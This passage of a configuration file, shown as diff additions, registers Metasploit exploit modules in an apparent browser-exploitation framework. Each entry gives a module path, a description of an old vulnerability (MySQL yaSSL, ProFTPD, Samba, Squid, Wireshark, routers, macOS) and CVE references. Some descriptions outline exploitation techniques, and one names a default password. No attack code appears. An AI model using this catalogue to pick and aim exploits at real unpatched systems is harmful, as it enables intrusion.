and /SafeSEH. During testing\n\ + \t\t\t\ton Windows XP SP3, these protections successfully prevented exploitation.\n\n\ + \t\t\t\tTesting was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n\ + \t\t\t\tpresent, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n\ + \t\t\t\tpackage were not exploitable due to the use of the compiler's FORTIFY feature.\n\n\ + \t\t\t\tAlthough suse11 was mentioned in the original blog post, the binary package they\n\ + \t\t\t\tprovide does not contain yaSSL or support SSL.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4484 + - - BID + - "37640" + - - BID + - "37943" + - - BID + - "37974" + - - OSVDB + - "61956" + - - URL + - http://secunia.com/advisories/38344/ + - - URL + - http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html + path: extensions/metasploit/ + class: Msf_module +msf_mysql_yassl_hello: + enable: true + msf: true + msf_key: windows/mysql/mysql_yassl_hello + name: MySQL yaSSL SSL Hello Message Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n\ + \t\t\t\timplementation bundled with MySQL <= 6.0. By sending a specially crafted\n\ + \t\t\t\tHello packet, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0226 + - - OSVDB + - "41195" + - - BID + - "27140" + path: extensions/metasploit/ + class: Msf_module +msf_proftp_telnet_iac: + enable: true + msf: true + msf_key: freebsd/ftp/proftp_telnet_iac + name: ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in versions of ProFTPD\n\ + \t\t\t\tserver between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n\ + \t\t\t\tlarge number of Telnet IAC commands, an attacker can corrupt memory and\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4221 + - - OSVDB + - "68985" + - - BID + - "44562" + path: extensions/metasploit/ + class: Msf_module +msf_proftp_sreplace: + enable: true + msf: true + msf_key: linux/ftp/proftp_sreplace + name: ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.2 through\n\ + \t\t\t\t1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n\ + \t\t\t\twithin the \"src/support.c\" file.\n\n\ + \t\t\t\tThe off-by-one heap overflow bug in the ProFTPD sreplace function has been\n\ + \t\t\t\tdiscovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n\ + \t\t\t\tthis off-by-one bug via MKD command, but failed. We did not work on this bug\n\ + \t\t\t\tsince then.\n\n\ + \t\t\t\tActually, there are exists at least two bugs in sreplace function, one is the\n\ + \t\t\t\tmentioned off-by-one heap overflow bug the other is a stack-based buffer overflow\n\ + \t\t\t\tvia 'sstrncpy(dst,src,negative argument)'.\n\n\ + \t\t\t\tWe were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n\ + \t\t\t\tversion, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n\ + \t\t\t\t1. another (integer) overflow in sreplace!\n\ + \t\t\t\t2. now it is possible to reach sreplace stack-based buffer overflow bug via\n\ + \t\t\t\t\tthe \"pr_display_file\" function!\n\ + \t\t\t\t3. stupid '.message' file display bug\n\n\ + \t\t\t\tSo we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n\ + \t\t\t\tTo reach the bug, you need to upload a specially created .message file to a\n\ + \t\t\t\twriteable directory, then do \"CWD \" to trigger the invocation\n\ + \t\t\t\tof sreplace function.\n\n\ + \t\t\t\tNote that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n\ + \t\t\t\tfile you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n\ + \t\t\t\tThe exploit is a part of VulnDisco Pack since Dec 2005.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5815 + - - OSVDB + - "68985" + - - BID + - "20992" + - - URL + - http://seclists.org/bugtraq/2006/Nov/94 + - - URL + - http://seclists.org/bugtraq/2006/Nov/538 + - - URL + - http://bugs.proftpd.org/show_bug.cgi?id=2858 + - - URL + - http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h + path: extensions/metasploit/ + class: Msf_module +msf_imap_uw_lsub: + enable: true + msf: true + msf_key: linux/imap/imap_uw_lsub + name: UoW IMAP server LSUB Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the 'LSUB'\n\ + \t\t\t\tcommand of the University of Washington IMAP service.\n\ + \t\t\t\tThis vulnerability can only be exploited with a valid username\n\ + \t\t\t\tand password.\n\ + \t\t\t" + authors: + - - CVE + - 2000-0284 + - - OSVDB + - "12037" + - - BID + - "1110" + - - URL + - http://www.milw0rm.com/exploits/284 + path: extensions/metasploit/ + class: Msf_module +msf_squid_ntlm_authenticate: + enable: true + msf: true + msf_key: linux/proxy/squid_ntlm_authenticate + name: Squid NTLM Authenticate Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for Squid\\'s NTLM authenticate overflow\n\ + \t\t\t\t(libntlmssp.c). Due to improper bounds checking in\n\ + \t\t\t\tntlm_check_auth, it is possible to overflow the 'pass'\n\ + \t\t\t\tvariable on the stack with user controlled data of a user\n\ + \t\t\t\tdefined length. Props to iDEFENSE for the advisory.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0541 + - - OSVDB + - "6791" + - - URL + - http://www.idefense.com/application/poi/display?id=107 + - - BID + - "10500" + path: extensions/metasploit/ + class: Msf_module +msf_alcatel_omnipcx_mastercgi_exec: + enable: true + msf: true + msf_key: linux/http/alcatel_omnipcx_mastercgi_exec + name: Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\ + \t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\n\ + \t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\n\ + \t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\n\ + \t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\n\ + \t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\n\ + \t\t\t\tmodule only supports command line payloads, as the httpd process kills\n\ + \t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\n\ + \t\t\t" + authors: + - - OSVDB + - "40521" + - - BID + - "25694" + - - CVE + - 2007-3010 + - - URL + - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm + path: extensions/metasploit/ + class: Msf_module +msf_piranha_passwd_exec: + enable: true + msf: true + msf_key: linux/http/piranha_passwd_exec + name: RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module abuses two flaws - a metacharacter injection vulnerability in the\n\ + \t\t\t\tHTTP management server of RedHat 6.2 systems running the Piranha\n\ + \t\t\t\tLVS cluster service and GUI (rpm packages: piranha and piranha-gui).\n\ + \t\t\t\tThe vulnerability allows an authenticated attacker to execute arbitrary\n\ + \t\t\t\tcommands as the Apache user account (nobody) within the\n\ + \t\t\t\t/piranha/secure/passwd.php3 script. The package installs with a default\n\ + \t\t\t\tuser and password of piranha:q which was exploited in the wild.\n\ + \t\t\t" + authors: + - - CVE + - 2000-0248 + - - OSVDB + - "289" + - - BID + - "1148" + - - CVE + - 2000-0322 + - - OSVDB + - "1300" + - - BID + - "1149" + path: extensions/metasploit/ + class: Msf_module +msf_linksys_apply_cgi: + enable: true + msf: true + msf_key: linux/http/linksys_apply_cgi + name: Linksys WRT54 Access Point apply.cgi Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.\n\ + \t\t\t\tAccording to iDefense who discovered this vulnerability, all WRT54G versions prior to\n\ + \t\t\t\t4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2799 + - - OSVDB + - "19389" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305 + path: extensions/metasploit/ + class: Msf_module +msf_ddwrt_cgibin_exec: + enable: true + msf: true + msf_key: linux/http/ddwrt_cgibin_exec + name: DD-WRT HTTP Daemon Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\ + \t\t\t\tHTTP management server of wireless gateways running DD-WRT. This flaw\n\ + \t\t\t\tallows an unauthenticated attacker to execute arbitrary commands as\n\ + \t\t\t\tthe root user account.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2765 + - - OSVDB + - "55990" + - - BID + - "35742" + - - URL + - http://www.milw0rm.com/exploits/9209 + path: extensions/metasploit/ + class: Msf_module +msf_gpsd_format_string: + enable: true + msf: true + msf_key: linux/http/gpsd_format_string + name: Berlios GPSD Format String Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability in the Berlios GPSD server.\n\ + \t\t\t\tThis vulnerability was discovered by Kevin Finisterre.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1388 + - - OSVDB + - "13199" + - - BID + - "12371" + - - URL + - http://www.securiteam.com/unixfocus/5LP0M1PEKK.html + path: extensions/metasploit/ + class: Msf_module +msf_peercast_url: + enable: true + msf: true + msf_key: windows/http/peercast_url + name: PeerCast <= 0.1216 URL Handling Buffer Overflow (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in PeerCast <= v0.1216.\n\ + \t\t\t\tThe vulnerability is caused due to a boundary error within the\n\ + \t\t\t\thandling of URL parameters.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1148 + - - OSVDB + - "23777" + - - BID + - "17040" + - - URL + - http://www.infigo.hr/in_focus/INFIGO-2006-03-01 + path: extensions/metasploit/ + class: Msf_module +msf_poptop_negative_read: + enable: true + msf: true + msf_key: linux/pptp/poptop_negative_read + name: Poptop Negative Read Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the Poptop negative read overflow. This will\n\ + \t\t\t\twork against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I\n\ + \t\t\t\tcurrently do not have a good way to detect Poptop versions.\n\n\ + \t\t\t\tThe server will by default only allow 4 concurrent manager processes\n\ + \t\t\t\t(what we run our code in), so you could have a max of 4 shells at once.\n\n\ + \t\t\t\tUsing the current method of exploitation, our socket will be closed\n\ + \t\t\t\tbefore we have the ability to run code, preventing the use of Findsock.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0213 + - - OSVDB + - "3293" + - - URL + - http://securityfocus.com/archive/1/317995 + - - URL + - http://www.freewebs.com/blightninjas/ + path: extensions/metasploit/ + class: Msf_module +msf_cyrus_pop3d_popsubfolders: + enable: true + msf: true + msf_key: linux/pop3/cyrus_pop3d_popsubfolders + name: Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploit takes advantage of a stack based overflow. Once the stack\n\ + \t\t\t\tcorruption has occured it is possible to overwrite a pointer which is\n\ + \t\t\t\tlater used for a memcpy. This gives us a write anything anywhere condition\n\ + \t\t\t\tsimilar to a format string vulnerability.\n\n\ + \t\t\t\tNOTE: The popsubfolders option is a non-default setting.\n\n\ + \t\t\t\tI chose to overwrite the GOT with my shellcode and return to it. This\n\ + \t\t\t\tdefeats the VA random patch and possibly other stack protection features.\n\n\ + \t\t\t\tTested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with\n\ + \t\t\t\ta version containing the vulnerable code, it is not exploitable due to the\n\ + \t\t\t\tuse of the FORTIFY_SOURCE compiler enhancement\n\ + \t\t\t" + authors: + - - CVE + - 2006-2502 + - - OSVDB + - "25853" + - - BID + - "18056" + - - URL + - http://www.exploit-db.com/exploits/2053 + - - URL + - http://www.exploit-db.com/exploits/2185 + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html + path: extensions/metasploit/ + class: Msf_module +msf_madwifi_giwscan_cb: + enable: true + msf: true + msf_key: linux/madwifi/madwifi_giwscan_cb + name: Madwifi SIOCGIWSCAN Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe Madwifi driver under Linux is vulnerable to a remote kernel-mode\n\ + \t\t\t\tstack-based buffer overflow.\n\n\ + \t\t\t\tThe vulnerability is triggered by one of these properly crafted\n\ + \t\t\t\tinformation element: WPA, RSN, WME and Atheros OUI Current madwifi\n\ + \t\t\t\tdriver (0.9.2) and and all madwifi-ng drivers since r1504 are\n\ + \t\t\t\tvulnerable\n\n\ + \t\t\t\tMadwifi 0.9.2.1 release corrects the issue.\n\n\ + \t\t\t\tThis module has been tested against Ubuntu 6.10 and is 100% reliable,\n\ + \t\t\t\tdoesn\\'t crash the Wifi stack and can exploit the same machine multiple\n\ + \t\t\t\ttime without the need to reboot it.\n\n\ + \t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux\n\ + \t\t\t\tplatform with a supported wireless card. Please see the Ruby Lorcon2\n\ + \t\t\t\tdocumentation (external/ruby-lorcon/README) for more information.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6332 + - - OSVDB + - "31267" + - - URL + - http://www.madwifi.org + path: extensions/metasploit/ + class: Msf_module +msf_chain_reply: + enable: true + msf: true + msf_key: linux/samba/chain_reply + name: Samba chain_reply Memory Corruption (Linux x86) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a memory corruption vulnerability present in Samba versions\n\ + \t\t\t\tprior to 3.3.13. When handling chained response packets, Samba fails to validate\n\ + \t\t\t\tthe offset value used when building the next part. By setting this value to a\n\ + \t\t\t\tnumber larger than the destination buffer size, an attacker can corrupt memory.\n\ + \t\t\t\tAdditionally, setting this value to a value smaller than 'smb_wct' (0x24) will\n\ + \t\t\t\tcause the header of the input buffer chunk to be corrupted.\n\n\ + \t\t\t\tAfter close inspection, it appears that 3.0.x versions of Samba are not\n\ + \t\t\t\texploitable. Since they use an \"InputBuffer\" size of 0x20441, an attacker cannot\n\ + \t\t\t\tcause memory to be corrupted in an exploitable way. It is possible to corrupt the\n\ + \t\t\t\theap header of the \"InputBuffer\", but it didn't seem possible to get the chunk\n\ + \t\t\t\tto be processed again prior to process exit.\n\n\ + \t\t\t\tIn order to gain code execution, this exploit attempts to overwrite a \"talloc\n\ + \t\t\t\tchunk\" destructor function pointer.\n\n\ + \t\t\t\tThis particular module is capable of exploiting the flaw on x86 Linux systems\n\ + \t\t\t\tthat do not have the nx memory protection.\n\n\ + \t\t\t\tNOTE: It is possible to make exploitation attempts indefinitely since Samba forks\n\ + \t\t\t\tfor user sessions in the default configuration.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2063 + - - OSVDB + - "65518" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873 + path: extensions/metasploit/ + class: Msf_module +msf_snortbopre: + enable: true + msf: true + msf_key: linux/ids/snortbopre + name: Snort Back Orifice Pre-Preprocessor Remote Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Back Orifice pre-processor module\n\ + \t\t\t\tincluded with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could\n\ + \t\t\t\tbe used to completely compromise a Snort sensor, and would typically gain an attacker\n\ + \t\t\t\tfull root or administrative privileges.\n\ + \t\t\t" + authors: + - - CVE + - 2005-3252 + - - OSVDB + - "20034" + - - BID + - "15131" + - - URL + - http://xforce.iss.net/xforce/alerts/id/207 + path: extensions/metasploit/ + class: Msf_module +msf_ut2004_secure: + enable: true + msf: true + msf_key: windows/games/ut2004_secure + name: Unreal Tournament 2004 "secure" Overflow (Win32) + category: Metasploit + description: "\n\n\ + \t\t\tThis is an exploit for the GameSpy secure query in\n\ + \t\t\tthe Unreal Engine.\n\n\ + \t\t\tThis exploit only requires one UDP packet, which can\n\ + \t\t\tbe both spoofed and sent to a broadcast address.\n\ + \t\t\tUsually, the GameSpy query server listens on port 7787,\n\ + \t\t\tbut you can manually specify the port as well.\n\n\ + \t\t\tThe RunServer.sh script will automatically restart the\n\ + \t\t\tserver upon a crash, giving us the ability to\n\ + \t\t\tbruteforce the service and exploit it multiple\n\ + \t\t\ttimes.\n\n\ + \t\t\t" + authors: + - - CVE + - 2004-0608 + - - OSVDB + - "7217" + - - BID + - "10570" + path: extensions/metasploit/ + class: Msf_module +msf_upnp_location: + enable: true + msf: true + msf_key: osx/mdns/upnp_location + name: Mac OS X mDNSResponder UPnP Location Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow that occurs when processing\n\ + \t\t\t\tspecially crafted requests set to mDNSResponder. All Mac OS X systems\n\ + \t\t\t\tbetween version 10.4 and 10.4.9 (without the 2007-005 patch) are\n\ + \t\t\t\taffected.\n\ + \t\t\t" + authors: + - - OSVDB + - "35142" + - - CVE + - 2007-2386 + - - BID + - "24144" + - - URL + - http://support.apple.com/kb/TA24732 + path: extensions/metasploit/ + class: Msf_module +msf_ufo_ai: + enable: true + msf: true + msf_key: windows/misc/ufo_ai + name: "UFO: Alien Invasion IRC Client Buffer Overflow Exploit" + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the IRC client component of\n\ + \t\t\t\tUFO: Alien Invasion 2.2.1.\n\ + \t\t\t" + authors: + - - OSVDB + - "65689" + - - URL + - http://www.exploit-db.com/exploits/14013 + path: extensions/metasploit/ + class: Msf_module +msf_safari_libtiff: + enable: true + msf: true + msf_key: osx/armle/safari_libtiff + name: iPhone MobileSafari LibTIFF Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the version of\n\ + \t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\ + \t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\ + \t\t\t\ttools installed will need to use a special payload.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3459 + - - OSVDB + - "27723" + - - BID + - "19283" + path: extensions/metasploit/ + class: Msf_module +msf_safari_metadata_archive: + enable: true + msf: true + msf_key: osx/browser/safari_metadata_archive + name: Safari Archive Metadata Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Safari's \"Safe file\" feature, which will\n\ + \t\t\t\tautomatically open any file with one of the allowed extensions. This can be abused\n\ + \t\t\t\tby supplying a zip file, containing a shell script, with a metafile indicating\n\ + \t\t\t\tthat the file should be opened by Terminal.app. This module depends on\n\ + \t\t\t\tthe 'zip' command-line utility.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0848 + - - OSVDB + - "23510" + - - BID + - "16736" + path: extensions/metasploit/ + class: Msf_module +msf_software_update: + enable: true + msf: true + msf_key: osx/browser/software_update + name: Apple OS X Software Update Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a feature in the Distribution Packages,\n\ + \t\t\t\twhich are used in the Apple Software Update mechanism. This feature\n\ + \t\t\t\tallows for arbitrary command execution through JavaScript. This exploit\n\ + \t\t\t\tprovides the malicious update server. Requests must be redirected to\n\ + \t\t\t\tthis server by other means for this exploit to work.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5863 + - - OSVDB + - "40722" + path: extensions/metasploit/ + class: Msf_module +msf_webstar_ftp_user: + enable: true + msf: true + msf_key: osx/ftp/webstar_ftp_user + name: WebSTAR FTP Server USER Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the logging routine\n\ + \t\t\t\tof the WebSTAR FTP server. Reliable code execution is\n\ + \t\t\t\tobtained by a series of hops through the System library.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0695 + - - OSVDB + - "7794" + - - BID + - "10720" + path: extensions/metasploit/ + class: Msf_module +msf_loginext: + enable: true + msf: true + msf_key: osx/afp/loginext + name: AppleFileServer LoginExt PathName Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the AppleFileServer service\n\ + \t\t\t\ton MacOS X. This vulnerability was originally reported by Atstake and\n\ + \t\t\t\twas actually one of the few useful advisories ever published by that\n\ + \t\t\t\tcompany. You only have one chance to exploit this bug.\n\ + \t\t\t\tThis particular exploit uses a stack-based return address that will\n\ + \t\t\t\tonly work under optimal conditions.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0430 + - - OSVDB + - "5762" + - - BID + - "10271" + path: extensions/metasploit/ + class: Msf_module +msf_evocam_webserver: + enable: true + msf: true + msf_key: osx/http/evocam_webserver + name: MacOS X EvoCam HTTP GET Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the web server provided with the EvoCam\n\ + \t\t\t\tprogram for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n\ + \t\t\t\tfrom the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n\ + \t\t\t\t3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2309 + - - OSVDB + - "65043" + - - URL + - http://www.exploit-db.com/exploits/12835 + path: extensions/metasploit/ + class: Msf_module +msf_type77: + enable: true + msf: true + msf_key: windows/arkeia/type77 + name: Arkeia Backup Client Type 77 Overflow (Win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\n\ + \t\t\t\tclient for the Windows platform. This vulnerability affects\n\ + \t\t\t\tall versions up to and including 5.3.3.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0491 + - - OSVDB + - "14011" + - - BID + - "12594" + - - URL + - http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html + path: extensions/metasploit/ + class: Msf_module +msf_quicktime_rtsp_content_type: + enable: true + msf: true + msf_key: osx/rtsp/quicktime_rtsp_content_type + name: MacOS X QuickTime RTSP Content-Type Overflow + category: Metasploit + description: No module description + authors: + - - CVE + - 2007-6166 + - - OSVDB + - "40876" + - - BID + - "26549" + path: extensions/metasploit/ + class: Msf_module +msf_mailapp_image_exec: + enable: true + msf: true + msf_key: osx/email/mailapp_image_exec + name: Mail.app Image Attachment Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command execution vulnerability in the\n\ + \t\t\t\tMail.app application shipped with Mac OS X 10.5.0. This flaw was\n\ + \t\t\t\tpatched in 10.4 in March of 2007, but reintroduced into the final\n\ + \t\t\t\trelease of 10.5.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0395 + - - CVE + - 2007-6165 + - - OSVDB + - "40875" + - - BID + - "26510" + - - BID + - "16907" + path: extensions/metasploit/ + class: Msf_module +msf_mobilemail_libtiff: + enable: true + msf: true + msf_key: osx/email/mobilemail_libtiff + name: iPhone MobileMail LibTIFF Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the version of\n\ + \t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\ + \t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\ + \t\t\t\ttools installed will need to use a special payload.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3459 + - - OSVDB + - "27723" + - - BID + - "19283" + path: extensions/metasploit/ + class: Msf_module +msf_manyargs: + enable: true + msf: true + msf_key: dialup/multi/login/manyargs + name: System V Derived /bin/login Extraneous Arguments Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploit connects to a system's modem over dialup and exploits\n\ + \t\t\t\ta buffer overlflow vulnerability in it's System V derived /bin/login.\n\ + \t\t\t\tThe vulnerability is triggered by providing a large number of arguments.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0797 + - - OSVDB + - "690" + - - OSVDB + - "691" + - - BID + - "3681" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html + path: extensions/metasploit/ + class: Msf_module +msf_mercantec_softcart: + enable: true + msf: true + msf_key: bsdi/softcart/mercantec_softcart + name: Mercantec SoftCart CGI Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis is an exploit for an undisclosed buffer overflow\n\ + \t\t\t\tin the SoftCart.exe CGI as shipped with Mercantec's shopping\n\ + \t\t\t\tcart software. It is possible to execute arbitrary code\n\ + \t\t\t\tby passing a malformed CGI parameter in an HTTP GET\n\ + \t\t\t\trequest. This issue is known to affect SoftCart version\n\ + \t\t\t\t4.00b.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2221 + - - OSVDB + - "9011" + - - BID + - "10926" + path: extensions/metasploit/ + class: Msf_module +msf_hagent_untrusted_hsdata: + enable: true + msf: true + msf_key: multi/wyse/hagent_untrusted_hsdata + name: Wyse Rapport Hagent Fake Hserver Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the Wyse Rapport Hagent service by pretending to\n\ + \t\t\t\tbe a legitimate server. This process involves starting both HTTP and\n\ + \t\t\t\tFTP services on the attacker side, then contacting the Hagent service of\n\ + \t\t\t\tthe target and indicating that an update is available. The target will\n\ + \t\t\t\tthen download the payload wrapped in an executable from the FTP service.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0695 + - - OSVDB + - "55839" + - - US-CERT-VU + - "654545" + - - URL + - http://snosoft.blogspot.com/ + - - URL + - http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/ + - - URL + - http://www.wyse.com/serviceandsupport/support/WSB09-01.zip + - - URL + - http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf + path: extensions/metasploit/ + class: Msf_module +msf_java_rmi_server: + enable: true + msf: true + msf_key: multi/misc/java_rmi_server + name: Java RMI Server Insecure Default Configuration Java Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module takes advantage of the default configuration of the RMI Registry and\n\ + \t\t\t\tRMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n\ + \t\t\t\tinvokes a method in the RMI Distributed Garbage Collector which is available via every\n\ + \t\t\t\tRMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n\ + \t\t\t\t(custom) RMI endpoints as well.\n\n\ + \t\t\t\t\tNote that it does not work against Java Management Extension (JMX) ports since those do\n\ + \t\t\t\tnot support remote class loading, unless another RMI endpoint is active in the same\n\ + \t\t\t\tJava process.\n\ + \t\t\t\t\n\ + \t\t\t\t\tRMI method calls do not support or require any sort of authentication.\n\ + \t\t\t" + authors: + - - URL + - http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html + path: extensions/metasploit/ + class: Msf_module +msf_wireshark_lwres_getaddrbyname: + enable: true + msf: true + msf_key: multi/misc/wireshark_lwres_getaddrbyname + name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\ + \t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\ + \t\t\t\toverflow. This bug found and reported by babi.\n\n\ + \t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\ + \t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\ + \t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\ + \t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\ + \t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\ + \t\t\t\tfragmented, which may cause additional complications.\n\n\ + \t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\ + \t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\ + \t\t\t\texploit this issue.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0304 + - - OSVDB + - "61987" + - - BID + - "37985" + - - URL + - http://www.wireshark.org/security/wnpa-sec-2010-02.html + - - URL + - http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h + path: extensions/metasploit/ + class: Msf_module +msf_wireshark_lwres_getaddrbyname_loop: + enable: true + msf: true + msf_key: multi/misc/wireshark_lwres_getaddrbyname_loop + name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) + category: Metasploit + description: "\n\ + \t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\ + \t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\ + \t\t\t\toverflow. This bug found and reported by babi.\n\n\ + \t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\ + \t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\ + \t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\ + \t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\ + \t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\ + \t\t\t\tfragmented, which may cause additional complications.\n\n\ + \t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\ + \t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\ + \t\t\t\texploit this issue.\n\n\ + \t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0304 + - - OSVDB + - 